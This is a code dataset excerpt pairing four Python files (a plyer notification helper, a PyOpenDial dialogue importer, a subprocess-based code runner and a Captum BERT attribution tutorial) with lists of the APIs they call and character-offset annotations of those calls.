code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
# Title: Notification Processor
# Tags: plyer, python
# Displays a desktop notification with a title and message of your choice.
# plyer is a third-party module; see its documentation for more information.
from plyer import notification
def notifyme(title, message, app_icon='', timeout=5):
    """Show a desktop notification via plyer.

    :param title: text shown as the notification title
    :param message: body text of the notification
    :param app_icon: path to an icon file to display; defaults to no icon
        (the previous hard-coded placeholder text was not a valid icon path)
    :param timeout: seconds the notification stays visible (default 5)
    """
    notification.notify(
        title=title,
        message=message,
        app_icon=app_icon,
        timeout=timeout,
    )
if __name__ == "__main__":
    # Only fire the demo notification when run as a script, not on import.
    notifyme("Title of notification box", "Message in notification")
| [
"plyer.notification.notify"
] | [((220, 326), 'plyer.notification.notify', 'notification.notify', ([], {'title': 'title', 'message': 'message', 'app_icon': '"""Write your icon address here"""', 'timeout': '(5)'}), "(title=title, message=message, app_icon=\n 'Write your icon address here', timeout=5)\n", (239, 326), False, 'from plyer import notification\n')] |
import logging
from threading import Thread
from time import sleep
from multipledispatch import dispatch
from dialogue_state import DialogueState
from modules.dialogue_recorder import DialogueRecorder
from modules.forward_planner import ForwardPlanner
class DialogueImporter(Thread):
    """
    Functionality to import a previously recorded dialogue in the dialogue system. The
    import essentially "replays" the previous interaction, including all state update
    operations.
    """
    # logger
    log = logging.getLogger('PyOpenDial')

    def __init__(self, system, turns):
        """
        Creates a new dialogue importer attached to a particular dialogue system, and
        with an ordered list of turns (encoded by their dialogue state).

        :param system: the dialogue system
        :param turns: the sequence of turns
        """
        # BUG FIX: Thread.__init__ was never called, so start() would raise
        # "RuntimeError: thread.__init__() not called".
        super(DialogueImporter, self).__init__()
        self.system = system
        self.turns = turns
        self.wizard_of_mode = False

    @dispatch(bool)
    def set_wizard_of_oz_mode(self, is_wizard_of_oz):
        """
        Sets whether the import should consider the system actions as "expert"
        Wizard-of-Oz actions to imitate.

        :param is_wizard_of_oz: whether the system actions are wizard-of-Oz examples
        """
        self.wizard_of_mode = is_wizard_of_oz

    @dispatch()
    def run(self):
        """Replay every recorded turn into the attached dialogue system."""
        if self.wizard_of_mode:
            # TODO: WizardLearner
            # self.system.attach_module(WizardLearner)
            # for turn in self.turns:
            #     self.add_turn(turn)
            pass
        else:
            # Disable forward planning while replaying so the imported turns
            # are not re-planned; restore it once the replay is complete.
            self.system.detach_module(ForwardPlanner)
            for turn in self.turns:
                self.add_turn(turn)
            state = self.system.get_state()
            state.remove_nodes(state.get_action_node_ids())
            state.remove_nodes(state.get_utility_node_ids())
            self.system.attach_module(ForwardPlanner)

    @dispatch(DialogueState)
    def add_turn(self, turn):
        """
        Add one recorded turn, first waiting until the system is unpaused and
        the dialogue recorder module is running.

        :param turn: the dialogue state of the turn to replay
        """
        try:
            # NOTE(review): 'is_pauesd' looks like a typo for 'is_paused' on
            # the system API -- confirm against the DialogueSystem class.
            while self.system.is_pauesd() or not self.system.get_module(DialogueRecorder).is_running():
                # Poll until ready. The original slept 100 *seconds* -- almost
                # certainly a Java Thread.sleep(100) (milliseconds) carried
                # over unconverted; 0.1 s keeps the intended poll interval.
                # The bare 'except: pass' around it (which also swallowed
                # KeyboardInterrupt) has been removed.
                sleep(0.1)
            self.system.add_content(turn.copy())
        except Exception as e:
            self.log.warning("could not add content: %s" % e)
| [
"logging.getLogger",
"multipledispatch.dispatch",
"time.sleep"
] | [((517, 548), 'logging.getLogger', 'logging.getLogger', (['"""PyOpenDial"""'], {}), "('PyOpenDial')\n", (534, 548), False, 'import logging\n'), ((958, 972), 'multipledispatch.dispatch', 'dispatch', (['bool'], {}), '(bool)\n', (966, 972), False, 'from multipledispatch import dispatch\n'), ((1317, 1327), 'multipledispatch.dispatch', 'dispatch', ([], {}), '()\n', (1325, 1327), False, 'from multipledispatch import dispatch\n'), ((1962, 1985), 'multipledispatch.dispatch', 'dispatch', (['DialogueState'], {}), '(DialogueState)\n', (1970, 1985), False, 'from multipledispatch import dispatch\n'), ((2209, 2219), 'time.sleep', 'sleep', (['(100)'], {}), '(100)\n', (2214, 2219), False, 'from time import sleep\n')] |
import os, sys, subprocess, tempfile, time
# Create a temporary directory and remember its path for generated scripts.
TempFile = tempfile.mkdtemp(suffix='_test', prefix='python_')
# Millisecond timestamp used to build a unique generated-file name.
FileNum = int(time.time() * 1000)
# Path of the Python interpreter executable used to run submitted code.
EXEC = sys.executable
# Report which Python version this runner executes code with.
def get_version():
    """Return the interpreter version formatted as 'python <major>.<minor>'."""
    info = sys.version_info
    return "python %s.%s" % (info.major, info.minor)
# Build the base name (without extension) of the generated script file.
def get_pyname():
    """Return the unique module name derived from the startup timestamp."""
    # FileNum is read-only here, so no 'global' declaration is required.
    return 'test_%d' % FileNum
# Persist the submitted source code as a .py file inside the temp directory.
def write_file(pyname, code):
    """Write *code* to '<TempFile>/<pyname>.py' and return the full path."""
    fpath = os.path.join(TempFile, '%s.py' % pyname)
    with open(fpath, 'w', encoding='utf-8') as handle:
        handle.write(code)
    print('file path: %s' % fpath)
    return fpath
# Decode raw subprocess output; child processes may emit UTF-8 or GBK bytes.
def decode(s):
    """Return *s* decoded as UTF-8, falling back to GBK when UTF-8 fails.

    Bytes valid in neither encoding raise UnicodeDecodeError from the
    final GBK attempt, matching the original behaviour.
    """
    last_error = None
    for encoding in ('utf-8', 'gbk'):
        try:
            return s.decode(encoding)
        except UnicodeDecodeError as exc:
            last_error = exc
    raise last_error
# Compile and run the submitted code, capturing its combined output.
def main(code):
    """Execute *code* in a child interpreter and return a result dict.

    :param code: Python source text to run
    :return: dict with keys 'version' (interpreter version string),
        'code' ('Success' or 'Error') and 'output' (decoded combined
        stdout/stderr of the child process)
    """
    r = dict()
    r["version"] = get_version()
    pyname = get_pyname()
    fpath = write_file(pyname, code)
    try:
        # check_output waits for the child and returns everything it wrote;
        # stderr is folded into stdout, and a 10 s timeout guards against
        # runaway scripts (TimeoutExpired propagates to the caller, as before).
        outdata = decode(subprocess.check_output([EXEC, fpath], stderr=subprocess.STDOUT, timeout=10))
    except subprocess.CalledProcessError as e:
        # e.output holds the child's combined output when it exits non-zero.
        r["code"] = 'Error'
        r["output"] = decode(e.output)
        return r
    else:
        r['output'] = outdata
        r["code"] = "Success"
        return r
    finally:
        # Best-effort cleanup: directories from mkdtemp() are NOT removed
        # automatically. BUG FIX: the original called exit(1) here, killing
        # the whole process just because the temp file could not be deleted.
        try:
            os.remove(fpath)
        except OSError:
            pass
if __name__ == '__main__':
    # Smoke test: run two print statements and show the captured result dict.
    demo_source = "print(11);print(12)"
    print(main(demo_source))
| [
"subprocess.check_output",
"os.path.join",
"tempfile.mkdtemp",
"time.time",
"os.remove"
] | [((75, 125), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {'suffix': '"""_test"""', 'prefix': '"""python_"""'}), "(suffix='_test', prefix='python_')\n", (91, 125), False, 'import os, sys, subprocess, tempfile, time\n'), ((465, 505), 'os.path.join', 'os.path.join', (['TempFile', "('%s.py' % pyname)"], {}), "(TempFile, '%s.py' % pyname)\n", (477, 505), False, 'import os, sys, subprocess, tempfile, time\n'), ((146, 157), 'time.time', 'time.time', ([], {}), '()\n', (155, 157), False, 'import os, sys, subprocess, tempfile, time\n'), ((1070, 1146), 'subprocess.check_output', 'subprocess.check_output', (['[EXEC, fpath]'], {'stderr': 'subprocess.STDOUT', 'timeout': '(10)'}), '([EXEC, fpath], stderr=subprocess.STDOUT, timeout=10)\n', (1093, 1146), False, 'import os, sys, subprocess, tempfile, time\n'), ((1500, 1516), 'os.remove', 'os.remove', (['fpath'], {}), '(fpath)\n', (1509, 1516), False, 'import os, sys, subprocess, tempfile, time\n')] |
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig
from captum.attr import visualization as viz
from captum.attr import LayerConductance, LayerIntegratedGradients
# Run on the first GPU when available, otherwise on CPU.
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Placeholder: point this at a fine-tuned BERT QA checkpoint directory.
model_path = "<PATH-TO-SAVED-MODEL>"
# Load the question-answering model in inference mode with gradients cleared
# (the attribution methods below still compute gradients w.r.t. inputs/layers).
model = BertForQuestionAnswering.from_pretrained(model_path)
model.to(device)
model.eval()
model.zero_grad()
# The tokenizer must match the checkpoint's vocabulary.
tokenizer = BertTokenizer.from_pretrained(model_path)
def predict(inputs, token_type_ids=None, position_ids=None, attention_mask=None):
    """Run the QA model and return its (start_logits, end_logits) pair."""
    result = model(
        inputs,
        token_type_ids=token_type_ids,
        position_ids=position_ids,
        attention_mask=attention_mask,
    )
    return result.start_logits, result.end_logits
def squad_pos_forward_func(inputs, token_type_ids=None, position_ids=None, attention_mask=None, position=0):
    """Attribution forward wrapper: per-example max start (position=0) or end (position=1) logit."""
    logits = predict(
        inputs, token_type_ids=token_type_ids, position_ids=position_ids, attention_mask=attention_mask
    )[position]
    return logits.max(1).values
# Special-token ids used both in real inputs and in attribution baselines:
# PAD serves as the neutral "reference" token for content positions.
ref_token_id = tokenizer.pad_token_id
sep_token_id = tokenizer.sep_token_id
cls_token_id = tokenizer.cls_token_id
def construct_input_ref_pair(question, text, ref_token_id, sep_token_id, cls_token_id):
    """Tokenise question/text into input ids plus a reference (baseline) sequence.

    Returns (input_ids tensor, ref_input_ids tensor, number of question tokens).
    """
    q_ids = tokenizer.encode(question, add_special_tokens=False)
    t_ids = tokenizer.encode(text, add_special_tokens=False)
    # Real input: [CLS] question [SEP] text [SEP]
    input_ids = [cls_token_id] + q_ids + [sep_token_id] + t_ids + [sep_token_id]
    # Baseline keeps the special tokens but replaces content with ref_token_id.
    ref_input_ids = (
        [cls_token_id]
        + [ref_token_id] * len(q_ids)
        + [sep_token_id]
        + [ref_token_id] * len(t_ids)
        + [sep_token_id]
    )
    input_tensor = torch.tensor([input_ids], device=device)
    ref_tensor = torch.tensor([ref_input_ids], device=device)
    return input_tensor, ref_tensor, len(q_ids)
def construct_input_ref_token_type_pair(input_ids, sep_ind=0):
    """Token-type ids (0 = question segment, 1 = text segment) and an all-zero baseline."""
    seq_len = input_ids.size(1)
    segment = [0 if pos <= sep_ind else 1 for pos in range(seq_len)]
    token_type_ids = torch.tensor([segment], device=device)
    ref_token_type_ids = torch.zeros_like(token_type_ids, device=device)
    return token_type_ids, ref_token_type_ids
def construct_input_ref_pos_id_pair(input_ids):
    """Position ids 0..seq_len-1 plus an all-zero baseline, broadcast to the input shape."""
    seq_length = input_ids.size(1)
    position_ids = (
        torch.arange(seq_length, dtype=torch.long, device=device).unsqueeze(0).expand_as(input_ids)
    )
    ref_position_ids = (
        torch.zeros(seq_length, dtype=torch.long, device=device).unsqueeze(0).expand_as(input_ids)
    )
    return position_ids, ref_position_ids
def construct_attention_mask(input_ids):
    """Attend to every token: a mask of ones shaped and typed like the input ids."""
    return torch.ones_like(input_ids)
def construct_whole_bert_embeddings(
    input_ids, ref_input_ids, token_type_ids=None, ref_token_type_ids=None, position_ids=None, ref_position_ids=None
):
    """Embed both the real inputs and their baselines with BERT's embedding layer."""
    embed = model.bert.embeddings
    input_embeddings = embed(input_ids, token_type_ids=token_type_ids, position_ids=position_ids)
    ref_input_embeddings = embed(ref_input_ids, token_type_ids=ref_token_type_ids, position_ids=ref_position_ids)
    return input_embeddings, ref_input_embeddings
# Example question / context pair.
question, text = (
    "What is important to us?",
    "It is important to us to include, empower and support humans of all kinds.",
)
# Build the model inputs and matching attribution baselines.
input_ids, ref_input_ids, sep_id = construct_input_ref_pair(question, text, ref_token_id, sep_token_id, cls_token_id)
token_type_ids, ref_token_type_ids = construct_input_ref_token_type_pair(input_ids, sep_id)
position_ids, ref_position_ids = construct_input_ref_pos_id_pair(input_ids)
attention_mask = construct_attention_mask(input_ids)
# Human-readable tokens for labelling the attributions later on.
indices = input_ids[0].detach().tolist()
all_tokens = tokenizer.convert_ids_to_tokens(indices)
# Locate the ground-truth answer span inside the token sequence.
ground_truth = "to include, empower and support humans of all kinds"
ground_truth_tokens = tokenizer.encode(ground_truth, add_special_tokens=False)
ground_truth_end_ind = indices.index(ground_truth_tokens[-1])
ground_truth_start_ind = ground_truth_end_ind - len(ground_truth_tokens) + 1
# Predict the answer span and print it.
start_scores, end_scores = predict(
    input_ids, token_type_ids=token_type_ids, position_ids=position_ids, attention_mask=attention_mask
)
print("Question: ", question)
print("Predicted Answer: ", " ".join(all_tokens[torch.argmax(start_scores) : torch.argmax(end_scores) + 1]))
# Layer Integrated Gradients over the whole embedding layer, attributed
# separately for the start-position (0) and end-position (1) outputs.
lig = LayerIntegratedGradients(squad_pos_forward_func, model.bert.embeddings)
attributions_start, delta_start = lig.attribute(
    inputs=input_ids,
    baselines=ref_input_ids,
    additional_forward_args=(token_type_ids, position_ids, attention_mask, 0),
    return_convergence_delta=True,
)
attributions_end, delta_end = lig.attribute(
    inputs=input_ids,
    baselines=ref_input_ids,
    additional_forward_args=(token_type_ids, position_ids, attention_mask, 1),
    return_convergence_delta=True,
)
def summarize_attributions(attributions):
    """Collapse per-dimension attributions into one L2-normalised score per token."""
    per_token = attributions.sum(dim=-1).squeeze(0)
    return per_token / torch.norm(per_token)
# Per-token attribution scores for the start and end predictions.
attributions_start_sum = summarize_attributions(attributions_start)
attributions_end_sum = summarize_attributions(attributions_end)
# Wrap the scores in Captum visualisation records.
start_position_vis = viz.VisualizationDataRecord(
    attributions_start_sum,
    torch.max(torch.softmax(start_scores[0], dim=0)),
    torch.argmax(start_scores),
    torch.argmax(start_scores),
    str(ground_truth_start_ind),
    attributions_start_sum.sum(),
    all_tokens,
    delta_start,
)
end_position_vis = viz.VisualizationDataRecord(
    attributions_end_sum,
    torch.max(torch.softmax(end_scores[0], dim=0)),
    torch.argmax(end_scores),
    torch.argmax(end_scores),
    str(ground_truth_end_ind),
    attributions_end_sum.sum(),
    all_tokens,
    delta_end,
)
# Render the token-level attributions (ANSI escapes make the headings bold).
print("\033[1m", "Visualizations For Start Position", "\033[0m")
viz.visualize_text([start_position_vis])
print("\033[1m", "Visualizations For End Position", "\033[0m")
viz.visualize_text([end_position_vis])
from IPython.display import Image
Image(filename="img/bert/visuals_of_start_end_predictions.png")
# Attribute each embedding sub-layer (word / token-type / position) separately.
lig2 = LayerIntegratedGradients(
    squad_pos_forward_func,
    [
        model.bert.embeddings.word_embeddings,
        model.bert.embeddings.token_type_embeddings,
        model.bert.embeddings.position_embeddings,
    ],
)
attributions_start = lig2.attribute(
    inputs=(input_ids, token_type_ids, position_ids),
    baselines=(ref_input_ids, ref_token_type_ids, ref_position_ids),
    additional_forward_args=(attention_mask, 0),
)
attributions_end = lig2.attribute(
    inputs=(input_ids, token_type_ids, position_ids),
    baselines=(ref_input_ids, ref_token_type_ids, ref_position_ids),
    additional_forward_args=(attention_mask, 1),
)
# Summarise the three sub-layer attributions per output position.
attributions_start_word = summarize_attributions(attributions_start[0])
attributions_end_word = summarize_attributions(attributions_end[0])
attributions_start_token_type = summarize_attributions(attributions_start[1])
attributions_end_token_type = summarize_attributions(attributions_end[1])
attributions_start_position = summarize_attributions(attributions_start[2])
attributions_end_position = summarize_attributions(attributions_end[2])
def get_topk_attributed_tokens(attrs, k=5):
    """Return the k highest-attribution tokens along with their scores and indices."""
    values, indices = torch.topk(attrs, k)
    top_tokens = [all_tokens[i] for i in indices]
    return top_tokens, values, indices
# Top-k attributed tokens for each embedding type and each output position.
top_words_start, top_words_val_start, top_word_ind_start = get_topk_attributed_tokens(attributions_start_word)
top_words_end, top_words_val_end, top_words_ind_end = get_topk_attributed_tokens(attributions_end_word)
top_token_type_start, top_token_type_val_start, top_token_type_ind_start = get_topk_attributed_tokens(
    attributions_start_token_type
)
top_token_type_end, top_token_type_val_end, top_token_type_ind_end = get_topk_attributed_tokens(
    attributions_end_token_type
)
top_pos_start, top_pos_val_start, pos_ind_start = get_topk_attributed_tokens(attributions_start_position)
top_pos_end, top_pos_val_end, pos_ind_end = get_topk_attributed_tokens(attributions_end_position)
# Tabulate the top tokens per embedding type for the start position.
# NOTE(review): the Token Type column zips top_words_val_start, not
# top_token_type_val_start -- this looks like a copy-paste slip; confirm
# against the original Captum tutorial before relying on these values.
df_start = pd.DataFrame(
    {
        "Word(Index), Attribution": [
            "{} ({}), {}".format(word, pos, round(val.item(), 2))
            for word, pos, val in zip(top_words_start, top_word_ind_start, top_words_val_start)
        ],
        "Token Type(Index), Attribution": [
            "{} ({}), {}".format(ttype, pos, round(val.item(), 2))
            for ttype, pos, val in zip(top_token_type_start, top_token_type_ind_start, top_words_val_start)
        ],
        "Position(Index), Attribution": [
            "{} ({}), {}".format(position, pos, round(val.item(), 2))
            for position, pos, val in zip(top_pos_start, pos_ind_start, top_pos_val_start)
        ],
    }
)
df_start.style.apply(["cell_ids: False"])
# Same table for the end position (same NOTE about top_words_val_end applies).
df_end = pd.DataFrame(
    {
        "Word(Index), Attribution": [
            "{} ({}), {}".format(word, pos, round(val.item(), 2))
            for word, pos, val in zip(top_words_end, top_words_ind_end, top_words_val_end)
        ],
        "Token Type(Index), Attribution": [
            "{} ({}), {}".format(ttype, pos, round(val.item(), 2))
            for ttype, pos, val in zip(top_token_type_end, top_token_type_ind_end, top_words_val_end)
        ],
        "Position(Index), Attribution": [
            "{} ({}), {}".format(position, pos, round(val.item(), 2))
            for position, pos, val in zip(top_pos_end, pos_ind_end, top_pos_val_end)
        ],
    }
)
df_end.style.apply(["cell_ids: False"])
# Notebook-style display of the token list and both tables.
["{}({})".format(token, str(i)) for i, token in enumerate(all_tokens)]
df_start
df_end
def squad_pos_forward_func2(input_emb, attention_mask=None, position=0):
    """Forward pass from precomputed embeddings; max logit at the given output position."""
    output = model(
        inputs_embeds=input_emb,
        attention_mask=attention_mask,
    )
    return output[position].max(1).values
# Layer-wise conductance: per-layer attribution summaries for all tokens, plus
# the full attribution distribution for one chosen token.
layer_attrs_start = []
layer_attrs_end = []
# Index of the token whose attribution distribution is inspected below.
token_to_explain = 23
layer_attrs_start_dist = []
layer_attrs_end_dist = []
input_embeddings, ref_input_embeddings = construct_whole_bert_embeddings(
    input_ids,
    ref_input_ids,
    token_type_ids=token_type_ids,
    ref_token_type_ids=ref_token_type_ids,
    position_ids=position_ids,
    ref_position_ids=ref_position_ids,
)
for i in range(model.config.num_hidden_layers):
    # Conductance through encoder layer i, for start (0) and end (1) outputs.
    lc = LayerConductance(squad_pos_forward_func2, model.bert.encoder.layer[i])
    layer_attributions_start = lc.attribute(
        inputs=input_embeddings, baselines=ref_input_embeddings, additional_forward_args=(attention_mask, 0)
    )
    layer_attributions_end = lc.attribute(
        inputs=input_embeddings, baselines=ref_input_embeddings, additional_forward_args=(attention_mask, 1)
    )
    layer_attrs_start.append(summarize_attributions(layer_attributions_start).cpu().detach().tolist())
    layer_attrs_end.append(summarize_attributions(layer_attributions_end).cpu().detach().tolist())
    layer_attrs_start_dist.append(layer_attributions_start[0, token_to_explain, :].cpu().detach().tolist())
    layer_attrs_end_dist.append(layer_attributions_end[0, token_to_explain, :].cpu().detach().tolist())
# Heatmap: token (x) vs encoder layer (y) attribution for the start position.
fig, ax = plt.subplots(figsize=(15, 5))
xticklabels = all_tokens
yticklabels = list(range(1, 13))
ax = sns.heatmap(np.array(layer_attrs_start), xticklabels=xticklabels, yticklabels=yticklabels, linewidth=0.2)
plt.xlabel("Tokens")
plt.ylabel("Layers")
plt.show()
# Same heatmap for the end position.
fig, ax = plt.subplots(figsize=(15, 5))
xticklabels = all_tokens
yticklabels = list(range(1, 13))
ax = sns.heatmap(np.array(layer_attrs_end), xticklabels=xticklabels, yticklabels=yticklabels, linewidth=0.2)
plt.xlabel("Tokens")
plt.ylabel("Layers")
plt.show()
# Box plots of the chosen token's attribution distribution per layer.
fig, ax = plt.subplots(figsize=(20, 10))
ax = sns.boxplot(data=layer_attrs_start_dist)
plt.xlabel("Layers")
plt.ylabel("Attribution")
plt.show()
fig, ax = plt.subplots(figsize=(20, 10))
ax = sns.boxplot(data=layer_attrs_end_dist)
plt.xlabel("Layers")
plt.ylabel("Attribution")
plt.show()
def pdf_attr(attrs, bins=100):
    """Empirical probability density of *attrs* as histogram bin heights."""
    density, _edges = np.histogram(attrs, bins=bins, density=True)
    return density
# Probability density of each layer's attribution distribution.
layer_attrs_end_pdf = map(lambda layer_attrs_end_dist: pdf_attr(layer_attrs_end_dist), layer_attrs_end_dist)
layer_attrs_end_pdf = np.array(list(layer_attrs_end_pdf))
# Total attribution per layer, used as the x-axis of the scatter plot below.
attr_sum = np.array(layer_attrs_end_dist).sum(-1)
# L1-normalise each layer's density so that the densities are comparable.
layer_attrs_end_pdf_norm = np.linalg.norm(layer_attrs_end_pdf, axis=-1, ord=1)
layer_attrs_end_pdf = np.transpose(layer_attrs_end_pdf)
# 'where=' skips division for zero norms; those entries keep unspecified values.
layer_attrs_end_pdf = np.divide(layer_attrs_end_pdf, layer_attrs_end_pdf_norm, where=layer_attrs_end_pdf_norm != 0)
fig, ax = plt.subplots(figsize=(20, 10))
plt.plot(layer_attrs_end_pdf)
plt.xlabel("Bins")
plt.ylabel("Density")
plt.legend(["Layer " + str(i) for i in range(1, 13)])
plt.show()
# Entropy of each layer's attribution density vs its total attribution.
fig, ax = plt.subplots(figsize=(20, 10))
# Replace zeros before log2 so 0 * log(0) contributes 0 instead of NaN/-inf.
layer_attrs_end_pdf[layer_attrs_end_pdf == 0] = 1
layer_attrs_end_pdf_log = np.log2(layer_attrs_end_pdf)
entropies = -(layer_attrs_end_pdf * layer_attrs_end_pdf_log).sum(0)
# Marker size encodes the entropy of each layer's distribution.
plt.scatter(np.arange(12), attr_sum, s=entropies * 100)
plt.xlabel("Layers")
plt.ylabel("Total Attribution")
plt.show()
| [
"matplotlib.pyplot.ylabel",
"torch.softmax",
"numpy.array",
"torch.cuda.is_available",
"numpy.linalg.norm",
"torch.arange",
"numpy.divide",
"numpy.arange",
"numpy.histogram",
"captum.attr.LayerIntegratedGradients",
"matplotlib.pyplot.xlabel",
"IPython.display.Image",
"captum.attr.visualizati... | [((440, 492), 'transformers.BertForQuestionAnswering.from_pretrained', 'BertForQuestionAnswering.from_pretrained', (['model_path'], {}), '(model_path)\n', (480, 492), False, 'from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig\n'), ((554, 595), 'transformers.BertTokenizer.from_pretrained', 'BertTokenizer.from_pretrained', (['model_path'], {}), '(model_path)\n', (583, 595), False, 'from transformers import BertTokenizer, BertForQuestionAnswering, BertConfig\n'), ((4349, 4420), 'captum.attr.LayerIntegratedGradients', 'LayerIntegratedGradients', (['squad_pos_forward_func', 'model.bert.embeddings'], {}), '(squad_pos_forward_func, model.bert.embeddings)\n', (4373, 4420), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((5814, 5854), 'captum.attr.visualization.visualize_text', 'viz.visualize_text', (['[start_position_vis]'], {}), '([start_position_vis])\n', (5832, 5854), True, 'from captum.attr import visualization as viz\n'), ((5919, 5957), 'captum.attr.visualization.visualize_text', 'viz.visualize_text', (['[end_position_vis]'], {}), '([end_position_vis])\n', (5937, 5957), True, 'from captum.attr import visualization as viz\n'), ((5994, 6057), 'IPython.display.Image', 'Image', ([], {'filename': '"""img/bert/visuals_of_start_end_predictions.png"""'}), "(filename='img/bert/visuals_of_start_end_predictions.png')\n", (5999, 6057), False, 'from IPython.display import Image\n'), ((6066, 6253), 'captum.attr.LayerIntegratedGradients', 'LayerIntegratedGradients', (['squad_pos_forward_func', '[model.bert.embeddings.word_embeddings, model.bert.embeddings.\n token_type_embeddings, model.bert.embeddings.position_embeddings]'], {}), '(squad_pos_forward_func, [model.bert.embeddings.\n word_embeddings, model.bert.embeddings.token_type_embeddings, model.\n bert.embeddings.position_embeddings])\n', (6090, 6253), False, 'from captum.attr import LayerConductance, LayerIntegratedGradients\n'), ((11048, 
11077), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 5)'}), '(figsize=(15, 5))\n', (11060, 11077), True, 'import matplotlib.pyplot as plt\n'), ((11247, 11267), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Tokens"""'], {}), "('Tokens')\n", (11257, 11267), True, 'import matplotlib.pyplot as plt\n'), ((11268, 11288), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Layers"""'], {}), "('Layers')\n", (11278, 11288), True, 'import matplotlib.pyplot as plt\n'), ((11289, 11299), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11297, 11299), True, 'import matplotlib.pyplot as plt\n'), ((11311, 11340), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(15, 5)'}), '(figsize=(15, 5))\n', (11323, 11340), True, 'import matplotlib.pyplot as plt\n'), ((11508, 11528), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Tokens"""'], {}), "('Tokens')\n", (11518, 11528), True, 'import matplotlib.pyplot as plt\n'), ((11529, 11549), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Layers"""'], {}), "('Layers')\n", (11539, 11549), True, 'import matplotlib.pyplot as plt\n'), ((11550, 11560), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11558, 11560), True, 'import matplotlib.pyplot as plt\n'), ((11572, 11602), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (11584, 11602), True, 'import matplotlib.pyplot as plt\n'), ((11608, 11648), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'layer_attrs_start_dist'}), '(data=layer_attrs_start_dist)\n', (11619, 11648), True, 'import seaborn as sns\n'), ((11649, 11669), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (11659, 11669), True, 'import matplotlib.pyplot as plt\n'), ((11670, 11695), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Attribution"""'], {}), "('Attribution')\n", (11680, 11695), True, 'import matplotlib.pyplot as plt\n'), ((11696, 11706), 'matplotlib.pyplot.show', 'plt.show', ([], {}), 
'()\n', (11704, 11706), True, 'import matplotlib.pyplot as plt\n'), ((11718, 11748), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (11730, 11748), True, 'import matplotlib.pyplot as plt\n'), ((11754, 11792), 'seaborn.boxplot', 'sns.boxplot', ([], {'data': 'layer_attrs_end_dist'}), '(data=layer_attrs_end_dist)\n', (11765, 11792), True, 'import seaborn as sns\n'), ((11793, 11813), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (11803, 11813), True, 'import matplotlib.pyplot as plt\n'), ((11814, 11839), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Attribution"""'], {}), "('Attribution')\n", (11824, 11839), True, 'import matplotlib.pyplot as plt\n'), ((11840, 11850), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (11848, 11850), True, 'import matplotlib.pyplot as plt\n'), ((12190, 12241), 'numpy.linalg.norm', 'np.linalg.norm', (['layer_attrs_end_pdf'], {'axis': '(-1)', 'ord': '(1)'}), '(layer_attrs_end_pdf, axis=-1, ord=1)\n', (12204, 12241), True, 'import numpy as np\n'), ((12264, 12297), 'numpy.transpose', 'np.transpose', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12276, 12297), True, 'import numpy as np\n'), ((12320, 12418), 'numpy.divide', 'np.divide', (['layer_attrs_end_pdf', 'layer_attrs_end_pdf_norm'], {'where': '(layer_attrs_end_pdf_norm != 0)'}), '(layer_attrs_end_pdf, layer_attrs_end_pdf_norm, where=\n layer_attrs_end_pdf_norm != 0)\n', (12329, 12418), True, 'import numpy as np\n'), ((12425, 12455), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (12437, 12455), True, 'import matplotlib.pyplot as plt\n'), ((12456, 12485), 'matplotlib.pyplot.plot', 'plt.plot', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12464, 12485), True, 'import matplotlib.pyplot as plt\n'), ((12486, 12504), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Bins"""'], {}), "('Bins')\n", (12496, 12504), True, 
'import matplotlib.pyplot as plt\n'), ((12505, 12526), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Density"""'], {}), "('Density')\n", (12515, 12526), True, 'import matplotlib.pyplot as plt\n'), ((12581, 12591), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12589, 12591), True, 'import matplotlib.pyplot as plt\n'), ((12603, 12633), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(20, 10)'}), '(figsize=(20, 10))\n', (12615, 12633), True, 'import matplotlib.pyplot as plt\n'), ((12710, 12738), 'numpy.log2', 'np.log2', (['layer_attrs_end_pdf'], {}), '(layer_attrs_end_pdf)\n', (12717, 12738), True, 'import numpy as np\n'), ((12864, 12884), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Layers"""'], {}), "('Layers')\n", (12874, 12884), True, 'import matplotlib.pyplot as plt\n'), ((12885, 12916), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Total Attribution"""'], {}), "('Total Attribution')\n", (12895, 12916), True, 'import matplotlib.pyplot as plt\n'), ((12917, 12927), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (12925, 12927), True, 'import matplotlib.pyplot as plt\n'), ((2130, 2177), 'torch.zeros_like', 'torch.zeros_like', (['token_type_ids'], {'device': 'device'}), '(token_type_ids, device=device)\n', (2146, 2177), False, 'import 